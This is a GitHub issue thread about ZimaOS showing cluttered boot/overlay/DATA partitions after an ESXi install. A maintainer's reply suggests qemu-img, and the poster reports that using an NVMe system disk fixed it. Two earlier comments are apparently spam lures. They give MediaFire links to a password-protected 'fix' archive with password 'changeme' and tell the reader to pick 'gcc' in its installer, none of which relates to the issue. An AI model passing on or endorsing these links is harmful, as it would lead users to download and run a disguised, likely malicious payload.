### ISSUE TITLE
ESXI安装文件系统错乱

### ISSUE THREAD

**Issue by DualWiki** [IceWhaleTech/ZimaOS#93]
![default](https://github.com/user-attachments/assets/d30949b3-7108-4624-92c3-8644cc19cbf3)
通过StarWind V2V Converter软件转换xz压缩包里的img文件为VMDK文件使用
安装好文件系统左侧会出现boot / overlay DATA 分区 ，感觉很凌乱。
尝试过安装低版本更新，结果是一样的。
这个要怎么操作才能像其他博主一样，显示左侧ZimaOS HD。
还有是否考虑出ISO镜像。img除了写盘，在ESXI里不方便。

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jerrykuku** [comment]
建议使用qemu-img. 大多数linux发行版都支持的。 具体命令为：
`
qemu-img convert -O vmdk -o adapter_type=lsilogic "zimaos.img" "zimaos.vmdk"
`
将zimaos.img 替换为你下载的系统镜像。 zimaos.vmdk 替换为你要转换成为的镜像。

**Comment by DualWiki** [comment]
> 建议使用qemu-img. 大多数linux发行版都支持的。 具体命令为：
> 
> `
> 
> qemu-img convert -O vmdk -o adapter_type=lsilogic "zimaos.img" "zimaos.vmdk"
> 
> `
> 
> 将zimaos.img 替换为你下载的系统镜像。 zimaos.vmdk 替换为你要转换成为的镜像。

谢谢，已经解决了，已经通过物理的方式安装了，不过还是有个问题SATA协议的硬盘作为系统盘，文件系统左侧还是会出现boot / overlay DATA 分区 ，用Nvme硬盘作为系统盘就不会出现，左侧直接显示的是ZimaOS HD。换个系统盘就行了！
